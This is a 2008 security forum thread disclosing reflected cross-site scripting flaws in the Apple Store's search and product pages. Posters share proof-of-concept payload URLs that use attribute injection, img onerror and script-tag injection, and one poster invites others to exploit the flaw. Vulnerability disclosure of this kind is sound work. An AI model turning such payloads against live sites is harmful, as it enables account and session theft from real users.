I emailed apple twice about an issue on the apple store search. They did not fix it for over a MONTH and never mailed me back either. They "fixed" it now, but they did a lousy job at it.

httx://store.apple.com/us/search?find="+onmouseover="alert(1)"

this will not work if you urlencode the "

anyway, originally it would allow anything, now it strips tags but it will allows attribute based exploits, so knock yourself out.

The reason I'm disclosing this now is because I really can't be bothered to run after apple, if they refuse to reply in a bearable time span or follow my advice.



Edited 3 time(s). Last edit at 07/18/2008 01:30PM by Kyo.

shweet!

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Still works. Seriously. How lame! PCI anyone?

- RSnake
Gotta love it. http://ha.ckers.org

http://store.apple.com/us/search?find=%22%3E%3Cimg%20src=%22.%22%20onerror=%22alert(1)%22%3Cinput

without onmouseover ^^
works in Firefox 2



Edited 1 time(s). Last edit at 08/04/2008 04:20PM by Jiu.

huh, looks like my browser was just being weird or something. they didn't fix it...

Nice guys!
Both patched, check this out...

http://store.apple.com/us/product/TU243LL/A?fnode=MTY1NDA4Mg&mco=MjQyMDQ1OA&s=newest'"><script>alert("The apple didn't fell far from the last apple")</script><div id="

http://rafelivgi.blogspot.com
Aspect9 Founder & Chief Security Architect
------------------------------------------
My job is to assess not assassinate
You can spend your life reading what others write or you can spend your life writing for others to read, choose your destiny!

Not okay! Good finds.

-Dan